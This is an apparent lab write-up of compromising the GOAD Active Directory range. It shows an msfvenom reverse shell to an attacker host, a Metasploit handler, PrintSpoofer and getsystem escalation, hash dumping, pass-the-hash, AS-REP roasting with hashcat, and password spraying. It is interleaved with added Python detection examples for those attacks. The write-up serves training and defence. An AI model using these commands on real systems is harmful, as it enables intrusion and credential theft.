
Active Directory Part 2 - Exploring GOAD Environment

Here I go through my process of exploiting the GOAD environment

# Description

In this writeup, I go through my exploitation process with GOAD. This process came out of my own investigation. I noticed the Castelblack machine was very insecure: it even had a file upload page when you visited the IP in a browser. I will go into how I exploited this and then gained higher privileges on the machine.

# Environments Used

  • GOAD
  • Kali

# Utilities Used

  • nmap
  • metasploit
  • msfvenom
  • PrintSpoofer
  • evil-winrm
  • sharphound
  • bloodhound
  • crackmapexec
  • Impacket-GetNPUsers
  • hashcat

# Project Walkthrough

# Reconnaissance

When I first started attacking the environment, I scanned the network with nmap. This gave me an idea of the services I would be encountering.

I tried to connect through SMB on all of the machines, but the only one with anything exposed was the Castelblack machine. I figured this was a good starting point. Here is the nmap scan for Castelblack.

```
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-20T20:46:29
|_Not valid after:  2055-01-20T20:46:29
| ms-sql-info: 
|   192.168.74.22:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   192.168.74.22:1433: 
|     Target_Name: NORTH
|     NetBIOS_Domain_Name: NORTH
|     NetBIOS_Computer_Name: CASTELBLACK
|     DNS_Domain_Name: north.sevenkingdoms.local
|     DNS_Computer_Name: castelblack.north.sevenkingdoms.local
|     DNS_Tree_Name: sevenkingdoms.local
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-01-20T22:45:06+00:00; 0s from scanner time.
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=castelblack.north.sevenkingdoms.local
| Not valid before: 2025-01-19T20:13:27
|_Not valid after:  2025-07-21T20:13:27
|_ssl-date: 2025-01-20T22:45:06+00:00; 0s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2025-01-20T22:45:06+00:00; 0s from scanner time.
|_http-title: Not Found
| ssl-cert: Subject: commonName=VAGRANT
| Subject Alternative Name: DNS:VAGRANT, DNS:vagrant
| Not valid before: 2025-01-19T11:21:16
|_Not valid after:  2028-01-19T11:21:16
| tls-alpn: 
|_  http/1.1
MAC Address: 00:0C:29:E4:82:DD (VMware)
Device type: general purpose
Running: Microsoft Windows 2019
OS CPE: cpe:/o:microsoft:windows_server_2019
OS details: Microsoft Windows Server 2019
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: CASTELBLACK, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:e4:82:dd (VMware)
| smb2-time: 
|   date: 2025-01-20T22:45:01
|_  start_date: N/A
```

The machine seems to have a web page that can be visited, so I went to the IP in my browser.

showing the landing page of the castelblack website

I clicked the link, and there was a file upload tool that told you where the files were being uploaded to. This was a clear way to get a shell.

the upload files page of the castelblack website

# Weaponizing

I used msfvenom to craft an .aspx reverse shell. There are a variety of ways this can be done and payloads you can use. Initially, I used just a basic shell and listened for it with netcat. However, Metasploit has a multi/handler module that can be used to spawn Meterpreter sessions, which give you a lot more wiggle room.

To craft the payload for this, run the following msfvenom command:

```bash
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<attackerip> LPORT=4444 -f aspx -o shell.aspx
```

The port can be whatever you want. In a real situation it’s best to avoid 4444, since it is the Metasploit default and is quickly picked up.

Now, once you upload the generated payload to the file upload page, you can visit /uploads/shell.aspx while you have metasploit listening, and you should get a session.

Run the following commands to set Metasploit up to catch the shell:

```bash
msfconsole
use multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost <attackerip>
set lport <portyouset>
run
```

# Exploitation

Now you can visit the shell uploaded, and a meterpreter session should spawn after a bit.
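From the defender’s side, the chain above (a POST to the upload page, then a request for a server-side script under `/uploads/`) is visible in the IIS logs. The following is an added example that is not part of the original post: it runs that correlation over constructed W3C-style log lines. The upload page path `/upload.aspx` is an assumption (the post does not name it); `/uploads/` is the directory the post shows.

```python
import re

# Constructed IIS W3C-style log lines (not from the original post), reduced to
# date time c-ip cs-method cs-uri-stem sc-status. One client POSTs to the
# upload page and then requests an .aspx file from /uploads/.
SAMPLE_LOG = """\
2025-01-20 22:50:01 192.168.74.50 GET /index.html 200
2025-01-20 22:50:09 192.168.74.50 GET /upload.aspx 200
2025-01-20 22:50:15 192.168.74.50 POST /upload.aspx 200
2025-01-20 22:50:21 192.168.74.50 GET /uploads/shell.aspx 200
2025-01-20 22:51:03 192.168.74.60 GET /uploads/report.pdf 200
2025-01-20 22:51:40 192.168.74.61 POST /upload.aspx 200
2025-01-20 22:51:45 192.168.74.61 GET /uploads/notes.txt 200
"""

# Extensions IIS hands to the ASP.NET/ASP handlers instead of serving as static files.
SCRIPT_EXT = {".aspx", ".asp", ".ashx", ".asmx"}
LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\d+)$")


def parse_lines(log_text):
    """Yield (timestamp, client_ip, method, uri, status) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3), m.group(4), int(m.group(5))


def find_upload_then_execute(log_text, upload_page="/upload.aspx", upload_dir="/uploads/"):
    """Return one alert per request for a server-side script under upload_dir.

    prior_upload is True when the same client POSTed to the upload page earlier
    in the log, which is the upload-then-browse-to-it pattern of a web shell drop.
    The upload_page path is an assumed value, not taken from the post.
    """
    uploaders = set()   # clients that have successfully POSTed to the upload page
    alerts = []
    for ts, ip, method, uri, status in parse_lines(log_text):
        if method == "POST" and uri == upload_page and status < 400:
            uploaders.add(ip)
        elif uri.startswith(upload_dir):
            dot = uri.rfind(".")
            ext = uri[dot:].lower() if dot != -1 else ""
            if ext in SCRIPT_EXT:
                alerts.append({"time": ts, "client": ip, "uri": uri,
                               "prior_upload": ip in uploaders})
    return alerts


if __name__ == "__main__":
    for alert in find_upload_then_execute(SAMPLE_LOG):
        print(alert)
```

The same data also shows the fix: a script under the upload directory should never be served by a handler, so the upload directory needs execute permissions removed (or uploads stored outside the web root) regardless of what the detection catches.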

the meterpreter shell spawning

The reason I went this route is that there are a variety of things you can do with a Meterpreter shell. Specifically, it makes it much easier to upload and download files. You can also spawn into a normal shell this way and then back out of it to use Meterpreter commands.

From here there are a variety of routes you can take. First, it’s best to elevate privileges. If you check the user you spawn as and their privileges, you will see an interesting one:

whoami command and whoami /priv command results

You’ll see that you have the SeImpersonatePrivilege enabled. The two attacks that can exploit this are JuicyPotato and PrintSpoofer. The JuicyPotato attack won’t work on this machine as it’s a Windows Server 2019 machine, so I went with PrintSpoofer.

You can do this manually by uploading PrintSpoofer64.exe to the box and running the following command:

```bash
PrintSpoofer64.exe -i -c cmd
```

This should spawn an elevated shell.

With Meterpreter, all you need to do is go back into the Meterpreter shell and type getsystem, and it will elevate you to NT AUTHORITY\SYSTEM.

using meterpreter to gain elevated privileges

From here, you should be able to just type hashdump into the meterpreter window, and all the user hashes should drop:

using meterpreter to dump hashes

From here, you can spawn a shell using evil-winrm with the Administrator hash.

using evil-winrm to remote access the machine

Evil-WinRM is helpful in the same way Meterpreter is: it lets you easily upload and download files. This is useful when gathering domain information with SharpHound, since you need to exfiltrate the zip it generates.

I was having trouble doing this through Evil-WinRM, so we’ll move over to Meterpreter with the SYSTEM privileges and attempt to run SharpHound that way.

using SharpHound to enumerate the domain

And from here you can use meterpreter to download the zip file.

using meterpreter to download sharphound zip file

# BloodHound

One great thing I like using BloodHound for is getting the users in the domain. You can also see what groups they’re a part of and ways you may be able to exploit their privileges.

The author of GOAD has a good tutorial on gathering users in other ways, but those did not work for me, so going this route was much easier, especially with the Castelblack box being so vulnerable. You can view his walkthrough here.

For me, I did the following query in BloodHound to view all the users.

```cypher
MATCH (u:User) RETURN u
```

And this was the result.

users being displayed in bloodhound

From here, you can make a list of users, which we will use to test for credentials. The methods of collecting user credentials in the GOAD guide were very useful.

# Credential Gathering

First, I made a list containing all the users we’ve captured.

image of user.txt file

You can also click through all the users in BloodHound and look at their privileges. Particularly, sometimes users will leave credentials in their descriptions. We find this with the samwell.tarly user.

user samwell.tarly having password in description

We can also check whether any users have their username as their password.

```bash
crackmapexec smb 192.168.74.11 -u users.txt -p users.txt --no-bruteforce --continue-on-success
```

checking for users using their username as their password

Another way to get credentials that was suggested in the guide was to use GetNPUsers.

```bash
impacket-GetNPUsers -usersfile users.txt -request -format hashcat -outputfile aspreroastables.txt -dc-ip 192.168.74.11 'north.sevenkingdoms.local/'
```

using getnpusers to dump kerberos hashes

This command generates a .txt file called ‘aspreroastables.txt’ which you can run through hashcat to try and crack.

```bash
hashcat -m 18200 aspreroastables.txt /usr/share/wordlists/rockyou.txt
```

using hashcat to crack hash dumped
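The GetNPUsers step works only against accounts with Kerberos pre-authentication disabled, and every request it makes lands on the domain controller as a 4768 event with Pre-Authentication Type 0 and, for the RC4 hashes that hashcat mode 18200 cracks, Ticket Encryption Type 0x17. The following is an added example (not from the original post) that applies those two checks to constructed 4768 records and flags a source that sweeps several such accounts; the account and IP values other than samwell.tarly are made up.

```python
# Constructed 4768 (Kerberos TGT requested) records, not from the original post,
# reduced to (TargetUserName, IpAddress, PreAuthType, TicketEncryptionType, Status).
# PreAuthType 0 means the AS-REQ carried no pre-authentication, which the KDC only
# accepts for accounts with "Do not require Kerberos preauthentication" set;
# 0x17 is RC4-HMAC, the cipher behind the $krb5asrep$23$ hashes hashcat -m 18200 cracks.
EVENTS = [
    ("arya.stark",    "192.168.74.50", "2", "0x12", "0x0"),  # normal: timestamp pre-auth, AES256
    ("svc.backup",    "192.168.74.50", "0", "0x17", "0x0"),  # no pre-auth, RC4: roastable
    ("svc.legacyapp", "192.168.74.50", "0", "0x17", "0x0"),
    ("samwell.tarly", "192.168.74.50", "2", "0x12", "0x0"),
    ("nobody.here",   "192.168.74.50", "-", "0x0",  "0x6"),  # failed: principal unknown
    ("svc.backup",    "192.168.74.30", "0", "0x17", "0x0"),  # one account from one host
]


def roastable_requests(events):
    """Return successful AS-REQs that carried no pre-authentication and got an RC4 ticket."""
    return [e for e in events
            if e[4] == "0x0" and e[2] == "0" and e[3].lower() == "0x17"]


def accounts_without_preauth(events):
    """Accounts that were issued a TGT without pre-auth: the ones to fix in AD."""
    return sorted({e[0] for e in roastable_requests(events)})


def roasting_sources(events, min_accounts=2):
    """Sources that pulled no-preauth RC4 AS-REPs for several distinct accounts.

    One such account is a misconfiguration; a burst across many accounts from
    one host matches a user-list run of a tool like GetNPUsers.
    """
    per_ip = {}
    for user, ip, *_ in roastable_requests(events):
        per_ip.setdefault(ip, set()).add(user)
    return {ip: sorted(users) for ip, users in per_ip.items()
            if len(users) >= min_accounts}


if __name__ == "__main__":
    print("accounts to re-enable pre-auth on:", accounts_without_preauth(EVENTS))
    print("sweeping sources:", roasting_sources(EVENTS))
```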

We should now have four credentials:

image of all the passwords collected so far

You can also perform a password spray with the users and passwords you’ve collected, but it looks like the passwords only match up with the people we found them for.

```bash
crackmapexec smb 192.168.74.11 -u users.txt -p passwords.txt --continue-on-success
```

image using crackmap to perform password spray
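Both crackmapexec runs above have the same footprint on the target: one source address failing logons against many different accounts in a short window, each account tried only a few times. As an added example that is not part of the original post, the following detects that shape in constructed 4625 (failed logon) records and ignores a single account failing repeatedly from another host; all IPs and account names here are made up.

```python
from datetime import datetime, timedelta

# Constructed 4625 (failed logon) records, not from the original post:
# (time, IpAddress, TargetUserName, SubStatus). 0xC000006A = wrong password.
FAILED_LOGONS = [
    ("2025-01-20 23:01:00", "192.168.74.50", "arya.stark",   "0xC000006A"),
    ("2025-01-20 23:01:01", "192.168.74.50", "hodor",        "0xC000006A"),
    ("2025-01-20 23:01:01", "192.168.74.50", "jon.snow",     "0xC000006A"),
    ("2025-01-20 23:01:02", "192.168.74.50", "sansa.stark",  "0xC000006A"),
    ("2025-01-20 23:01:02", "192.168.74.50", "rickon.stark", "0xC000006A"),
    ("2025-01-20 23:05:00", "192.168.74.70", "eddard.stark", "0xC000006A"),  # one user,
    ("2025-01-20 23:07:00", "192.168.74.70", "eddard.stark", "0xC000006A"),  # a typo, not a spray
]


def detect_spray(events, window=timedelta(minutes=5), min_users=4):
    """Return {source_ip: [users]} for sources whose failures within one
    sliding window cover at least min_users distinct accounts.

    The same account failing repeatedly from one host (typo, stale service
    password) never reaches min_users and is not flagged.
    """
    by_ip = {}
    for ts, ip, user, _sub in events:
        when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        by_ip.setdefault(ip, []).append((when, user))
    flagged = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            users = {u for t, u in attempts[i:] if t - start <= window}
            if len(users) >= min_users:
                flagged[ip] = sorted(users)
                break
    return flagged


if __name__ == "__main__":
    print(detect_spray(FAILED_LOGONS))
```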


# Conclusion

This was just the first part of my exploration through Active Directory utilizing GOAD. In the coming writeups, I will be exploring getting into the other machines and moving around in the environment further.

Please leave a comment if you have any recommendations on things I could improve, or any thoughts on the process. Thank you for reading!
